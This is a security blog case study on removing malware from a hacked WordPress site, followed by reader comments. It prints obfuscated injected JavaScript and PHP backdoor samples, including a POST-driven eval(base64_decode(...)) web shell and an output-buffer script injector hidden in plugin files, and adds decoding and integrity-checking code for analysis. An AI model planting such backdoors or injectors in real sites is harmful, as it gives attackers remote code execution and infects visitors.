
Removing Malware from a WordPress blog – Case Study

Updated 20160914

This post is very specific to one type of infection. There are many different types of infections and symptoms, so do not be discouraged if this scenario does not fit your situation.

Earlier this week we were hired to remove malware from a fairly popular web site. The malicious code had been there for a while and the site got blacklisted by Google; that is how the owner noticed it.

Every time someone tried to visit it (using Chrome or Firefox) or searched for the site on Google, that ugly "Reported Attack Site" message would show up.

Uh-oh, not good for a site owner who makes money with ads and can't afford to lose users. If they had been using our Web-based Integrity monitor, or had recognized the early symptoms of a hacked site, that would not have happened; since they hadn't, it was time to fix the problem. Remember: no matter what CMS your site runs on, be it WordPress, Joomla, Drupal or something else, we can help fix and prevent malware on your website.

1-Understanding the problem

The first thing we did was look at where and how the code was showing up. We used a simple dump tool to fetch the page source (lynx is a text-mode browser available on most Linux systems, and unlike a desktop browser it will not execute the injected script):

$ lynx -source -dump [siteinquestion]

It prints the whole page source, and by going through it we found the following strange JavaScript (slightly modified to protect the innocent):

(function(){var OgDs='%';var FJQr=('v_61r_20_61_3d_22Scr_69ptEn_67_69ne_22_2c_62_3d_22_56ers_69on()+_
22_2cj_3d… _64ex_4ff(_22Chrome_22_29_3c0)_26_26(u_2ei_6ede_78_4ff
(_22_57_69_6e_22)_3e0).._3b_7d').replace(/_/g,OgDs);var NF1=unescape(FJQr);eval(NF1)})();

We also ran our free site scanner and it confirmed that the code was indeed malicious.

2-Analyzing the javascript

There are multiple ways to analyze malicious JavaScript, and we chose the easiest one. The attacker added an escaped string, unescaped it at run time and passed the result to eval. I copied the JavaScript to a local file and replaced the final eval call with alert: now, instead of executing the decoded code, the wrapper prints it. (Even so, do this in a throwaway browser profile or a VM; you are still running the attacker's outer wrapper, and a nastier variant could do more than just decode a string.) The result:

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("src=//martu"+"</script>");}

So, the unescaped code first fingerprints the visitor (not Chrome, Windows but not NT 6, no "miek=1" cookie, and a guard variable so it runs only once), builds an Internet Explorer ScriptEngine version string, and then uses document.write to load another script from an external domain (elided here). After searching a bit, this seems to be an old attack (from mid-2009) that is somehow still going around. The domain is now unreachable, so the good news is that the attack is not currently doing anything to users; the bad news is that the backdoor that planted it was still on the server.
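The eval-to-alert trick above works, but it still runs the attacker's wrapper in a browser. Here is an added example (mine, not code from the original post) that undoes the replace()/unescape()/eval() layer statically and lists which tell-tale fragments the decoded script contains. It assumes the wrapper has exactly the shape quoted above (a one-character separator in the first variable, a quoted payload, and a replace(/x/g, ...) call); the sample payload is constructed, shortened and pointed at a reserved .invalid domain rather than the real injected script.

```python
import re
from typing import List, Optional

# Shape of the wrapper quoted above:
#   var X='%';var Y=('..._61...').replace(/_/g,X);var Z=unescape(Y);eval(Z)
# group 1: the character stored in X, group 2: the quoted payload,
# group 3: the single character that replace() swaps for it.
WRAPPER_RE = re.compile(
    r"var\s+\w+\s*=\s*'([^'])'\s*;\s*"          # var OgDs='%';
    r"var\s+\w+\s*=\s*\('([^']*)'\)"            # var FJQr=('payload')
    r"\s*\.replace\(/(.)/g\s*,\s*\w+\)",        # .replace(/_/g,OgDs)
    re.S,
)


def js_unescape(s: str) -> str:
    """Python equivalent of JavaScript's legacy unescape(): %XX and %uXXXX -> character."""
    return re.sub(
        r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
        lambda m: chr(int(m.group(1) or m.group(2), 16)),
        s,
    )


def decode_wrapper(js: str) -> Optional[str]:
    """Return the script eval() would have run, without executing anything.
    Returns None when the wrapper pattern is not present."""
    m = WRAPPER_RE.search(js)
    if not m:
        return None
    sep, payload, placeholder = m.group(1), m.group(2), m.group(3)
    # replace(/_/g,'%') followed by unescape()
    return js_unescape(payload.replace(placeholder, sep))


# Fragments seen in the decoded script in the analysis above.
INDICATORS = ["document.write", "eval(", "src=//", "navigator.userAgent",
              "document.cookie", "ScriptEngine", "fromCharCode"]


def indicators(script: str) -> List[str]:
    """Which tell-tale fragments appear in a decoded script."""
    return [i for i in INDICATORS if i in script]


# Constructed sample modelled on the wrapper quoted above: shortened payload,
# pointed at a reserved .invalid domain. Not the real injected code.
SAMPLE = (
    "(function(){var OgDs='%';var FJQr=('_64ocument_2ewr_69te(_22_3cscr_69pt src=//"
    "_65xample_2einvalid/x_2ejs_3e_3c/scr_69pt_3e_22)').replace(/_/g,OgDs);"
    "var NF1=unescape(FJQr);eval(NF1)})();"
)

if __name__ == "__main__":
    decoded = decode_wrapper(SAMPLE)
    print(decoded)
    print("indicators:", indicators(decoded or ""))
```

The inner script in the real sample builds a second eval() argument by string concatenation at run time, so a static decoder stops at the layer shown; that is the point at which the alert() trick, or a JavaScript debugger in an isolated VM, takes over.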

3-Cleaning up WordPress

Once we knew what the code was and what it was doing, it was time to remove it from the site. This is what we did:

  1. Backed up the whole WordPress database (using the Export tool and via an SQL dump)
  2. Backed up the whole WordPress directory for analysis and removed it from the site
  3. Changed all passwords, removed unused accounts and services, and cleaned up the box
  4. Reinstalled WordPress from scratch (latest version), re-imported the database (after checking that it was safe: look in wp_posts and wp_options for injected script tags and iframes, and in wp_users for accounts you don't recognize) and reinstalled their theme from scratch (to make sure it was not hacked too).
  5. Worked with Google to get the site removed from their blacklist

4-Analysis of the malware

Once the site was clean and the client happy, we went back and did a proper analysis of the attack. First, we diffed their WordPress tree against a pristine copy of the same release (they were on version 2.8):

$ diff -r -i --strip-trailing-cr -b -B sitedump/public_html wordPress
Only in sitedump/public_html/wp-content/plugins: multi-level-navigation-plugin1
Only in sitedump/public_html/wp-content/plugins: order-categories
Only in sitedump/public_html/wp-content/plugins: seo-automatic-links
Only in sitedump/public_html/wp-content/plugins: wp-contact-form
Only in sitedump/public_html/wp-content/plugins: wp-db-backup

We also diffed the original theme against the one they were using and found no major changes. With core and theme ruled out, it was clear to us that the problem was in one of the plugins.

We started by searching the plugins directory for that JavaScript and nothing came back. That meant the code was probably obfuscated (escaped or encoded) in some way, so we searched instead for base64_decode and eval, PHP functions that malware authors use all the time:

multi-level-navigation-plugin1/images/image.php:<?php
eval(base64_decode(
yNjkzYTYyNzQ2YzY0NmY3YTY1NzInOw==')); ?>
multi-level-navigation-plugin1/images/gifimg.php:<?php eval(base64_decode("aWYoaXNzZX..zZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==")); ?>
wp-db-backup/wp-db-backup.php:<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval(
wdCBsYW5ndWFnZT1qYXZhc..2NyaXB0PjwhLS0gCPC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'".,;?![]:/()]{30,}#',$v)||preg_match('#[([](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n(function(.+?\n -->#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl']
,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$

So, these three files (wp-db-backup/wp-db-backup.php, image.php and gifimg.php) had something hidden in them. To analyze the code we did the same thing we did with the JavaScript: we replaced eval with echo so the script prints its payload instead of running it. For wp-db-backup.php we pulled out the encoded string and decoded it externally with the base64 command-line tool:

$ php multi-level-navigation-plugin1/images/image.php
if(isset($_POST['e']))eval(base64_decode(
$_POST['e']));echo '32303d2e34332e3230382e3231323a64696865746172693a62746c646f7a6572';
$ php multi-level-navigation-plugin1/images/gifimg.php
if(isset($_POST['e']))eval(base64_decode(

Analysis for the wp-db-backup.php:

$ echo "PHNjcmlwdCB..pOwogLS0+PC9zY3JpcHQ" | base64 -d
<script language=javascript><!--
(function(){var OgDs='%';var FJQr=('v_61r_20_61r_2eu_j_3b_22)_3b_64_6fc_75ment_2e_77_72ite(_22_3cscr
eplace(/_/g,OgDs);var NF1=unescape(FJQr);eval(NF1)})();

So, all three files carried a backdoor that lets the attacker run any PHP code (and, through it, any command the web server user can run) by POSTing a base64-encoded script in the e parameter (see eval(base64_decode($_POST['e']))); the fixed hex string image.php echoes is presumably a tag that lets the attacker's tools confirm the backdoor is still alive. On top of that, wp-db-backup.php registered an output-buffer callback (ob_start) that strips any competing injected scripts and inserts the malicious JavaScript right before the <body> tag of every page the site serves, which is why the code showed up on every URL while no post or template actually contained it.

Lessons learned

First, always monitor your systems. If they had a HIDS installed (like the open source OSSEC), it would have detected the modification of those files as soon as it happened.
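An added example (mine; not from the post and not OSSEC's code) of the two comparisons this page relies on: the diff against a pristine release in section 4, and the file-integrity check a HIDS would have been running all along. It hashes a tree with SHA-256, stores the baseline as JSON outside the web root, and reports added, removed and modified files. The site tree and the planted changes are constructed in temporary directories and only modelled on the files above.

```python
import hashlib
import json
import os
import tempfile
from typing import Dict, List


def hash_tree(root: str) -> Dict[str, str]:
    """SHA-256 of every regular file below root, keyed by forward-slash relative path."""
    hashes: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            hashes[rel] = digest.hexdigest()
    return hashes


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every path as added, removed or modified relative to the baseline.
    With baseline = a pristine WordPress release this is the 'diff -r' of section 4;
    with baseline = yesterday's snapshot of the site it is what a HIDS alerts on."""
    old, new = set(baseline), set(current)
    return {
        "added": sorted(new - old),
        "removed": sorted(old - new),
        "modified": sorted(p for p in old & new if baseline[p] != current[p]),
    }


def save_baseline(hashes: Dict[str, str], path: str) -> None:
    # Keep this file outside the web root (better: on another host). An attacker
    # holding a PHP backdoor can rewrite anything the web server user can write.
    with open(path, "w") as fh:
        json.dump(hashes, fh, indent=1, sort_keys=True)


def load_baseline(path: str) -> Dict[str, str]:
    with open(path) as fh:
        return json.load(fh)


def _write(root: str, rel: str, body: str) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(body)


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: snapshot a clean site, plant the kind of changes seen
    above (an appended backdoor in a plugin file and a new PHP file in an images
    directory), then report what changed."""
    with tempfile.TemporaryDirectory() as site, tempfile.TemporaryDirectory() as vault:
        _write(site, "wp-content/plugins/wp-db-backup/wp-db-backup.php",
               "<?php\n// constructed stand-in for the legitimate plugin\n")
        _write(site, "wp-content/plugins/order-categories/order-categories.php",
               "<?php\n// constructed stand-in for another legitimate plugin\n")
        baseline_path = os.path.join(vault, "baseline.json")
        save_baseline(hash_tree(site), baseline_path)

        # Simulated compromise (constructed): backdoor appended, dropper added.
        with open(os.path.join(site, "wp-content/plugins/wp-db-backup/wp-db-backup.php"), "a") as fh:
            fh.write("if(isset($_POST['x']))eval(base64_decode($_POST['x']));\n")
        _write(site, "wp-content/plugins/multi-level-navigation-plugin1/images/image.php",
               "<?php eval(base64_decode('...')); ?>\n")

        return compare(load_baseline(baseline_path), hash_tree(site))


if __name__ == "__main__":
    for kind, paths in demo().items():
        for p in paths:
            print(f"{kind:9} {p}")
```

Run `compare(hash_tree(pristine_wordpress), hash_tree(site))` and "added" is your plugins, themes and uploads (the list diff -r produced above) while "modified" is core files that have been tampered with. For the monitoring use, schedule the snapshot and ship both it and the report off the box; a baseline that lives next to the backdoor is only as trustworthy as the backdoor lets it be.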

Second, if they had been using our Web-based Integrity monitor, this problem would have been detected much earlier as well.

Third: keep your log files longer. Our analysis was not as complete as we would have liked, because we could not go back far enough in time to see when, and through which hole, the compromise happened.

Lastly, keep WordPress and its plugins updated and use strong passwords. That is your first line of defense against these problems.

If this scenario did not match your scenario and you require professional support feel free to look into our Website AntiVirus product or check your website via our free Online Security scanner (SiteCheck).


  • A very nice write-up on how to troubleshoot a setup for clients. I would love to learn more on this subject, keep up the good work.
    Benjamin Straw

  • Thanks! I appreciate the feedback.

  • I would like to thank you for the efforts you have made in writing this article. I am hoping the same best work from you in the future as well. In fact your creative writing abilities have inspired me to start my own BlogEngine blog now. Really, blogging is spreading its wings rapidly. Your write-up is a fine example of it.

  • I have this issue with a very large news site. I have no problem with getting a clean install of WP going, but it is finding the triggers that must be in the database I am struggling with.

    The minute I connect the original db to the new install the same problem occurs. This is even occurring on a local install.

  • Chris

    I stumbled onto this site in my search to find help fixing my wordpress based site. I'm not trying to bash you here in your comments section, but I have to be honest and say that it makes me very nervous for my computer's safety, and perhaps even more so to do business with you because when I arrived at this particular page, my Avast AV security pops up for the first time ever since I've had it (got it in the last 2 weeks or so), and says out loud, "Threat has been detected".

    It opens a small notification window that reads:
    avast! Web Shield has blocked a threat.
    No further action is required.
    Action: Connection Aborted
    The threat was detected and blocked while downloading an item from the web.

    Yikes! What is up with this?

    What to do about my site? Ugh…

    • Thanks for the comment Chris. The warning you're receiving is a false positive.

      When we write a post we typically include a sample of what the malicious code may look like (merely showing people what attacked them) just like in the analysis above.


      • Chris

        Thanks for the reply. Please excuse my ignorance–I suck at anything related to computers. At least the AV thing is working good. 🙂 Please feel free to remove these messages if you find that to be appropriate.

        Now, about my site…

        • Chris, no problem and we can appreciate the concern, thank you for bringing up the subject. You can report this to your antivirus provider as a false positive if it alerts you again.

          Can you talk a bit to what problems you're encountering on your site? Feel free to contact us off the blog if you'd prefer:


  • Hi,

    Very nice article, which helped me a lot.

    Thank you.

    My recent post Work with SVN

  • Pingback: Keep your blog from being hacked. | DonnellDesign Blog()

  • hot celebrities

    Very helpful article, please keep up your work because it keeps me updated.

  • Anu

    I have found this malware in our index file. It was found on our school website and we would like to fix it ASAP.
    Please could someone tell me which fix is the most appropriate for this?

    Many thanks

  • I got my 35-install multi-WordPress (in my sig) hacked just recently and I had this wp-database plugin on a few of the installs. The PHP script they used (same PHP command) infected hundreds of WP files and CRM files and I fixed it using a find-and-replace program. Hopefully it is this plugin that they used, as other than that I am at a loss as to how they gained entrance, as FTP and RDP ports are off. It's a Windows server that only has one site on it!

  • Pingback: Wordpress – Questo sito potrebbe arrecare danni al tuo computer.()

  • Pingback: Mandatory Security Update: WordPress 3.0.4 | Blogging News, WordPress News, Social Media News from WordCast()

  • footprint20

    Had 6 sites in one week, luckily no money sites, but they were all testing in a new niche. Had all on the first page, now blacklisted. Now I don't know what to do? Any suggestions? I guess just move on to some new ones. I will keep you in mind for the future once I get them tested as a goer site, then I sell after I have constructed them. I will be back, so I don't get compromised. Thanks for the info, got you bookmarked!

  • Pingback: How to protect your blog from viruses, backdoor Trojans and other nasty stuff —

  • How to check that your database is safe?

  • James

    While using your service I could find positive infection on random peoples websites.

    I could also find the occasional false positive.

    That is why I will not be recommending this service to others until there is a definitive difference in the way you report “potential” infections.

    Guys, there is so much malware out there, why make the false positives look just as menacing as the true positives?

    Other than that. Great product guys.

  • Santhosh1989mpt

    How do I rectify a blacklisted site?


  • Habel

    My WordPress blog has the same problem... I have tried removing the malware but my blog is still listed as an attack site...

  • vijay kumar goyal

    Join a LinkedIn group and get your question resolved.
    tech support group
    we24support – by linkedin

  • Pingback: Tidy-Up Tuesday: Watch your backend()

  • f_monts

    this site contains malware lol! when I open this page, I get a JS.Crypt.BQK (Mutant) in the cache folder of the browser!

  • How to find malware on the website, how to remove it and how to make the website secure?

    please help.

  • Pingback: » Saturday Link Roundup–”Your Wordpress blog has been hacked” Edition()

  • Pingback: Oh Sh*#! What to Do When Your WordPress Website Has Been Hacked | Elegant Themes Blog()

  • Pingback: My Site Was Hacked: How To Remove Malware From WordPress | The Strategic Blogger()

  • Pingback: What to Do When Your WordPress Website Has Been Hacked()

  • Charles

    Many thanks for this blog post; it was instrumental in finding the malware that infected our WordPress site !

  • Johnny Hurst

    My WordPress site has been taken over and my admin account deleted, now I can't get into it. My host restored it to about a month ago but it didn't do any good, I still can't get in. Anyone know what I should do?

    • pageii

      First, you need to identify your WordPress version. (1) Go to http://your_url/readme.html. (2) Download a new WordPress installer of the same version. Replace only the wp-admin folder. You should also replace wp-include. Now try logging in. I'm assuming you know the basics (e.g. backing up your files as mentioned by Daniel Cid).

  • Our website has this “Anal” link to it, I can’t find the codes on the theme that I want to delete.

  • pageii

    Do not discount the possibility of host-level compromise. If your .htaccess file at root folder (public_html) is being modified without your knowledge, consider this issue as one possible scenario.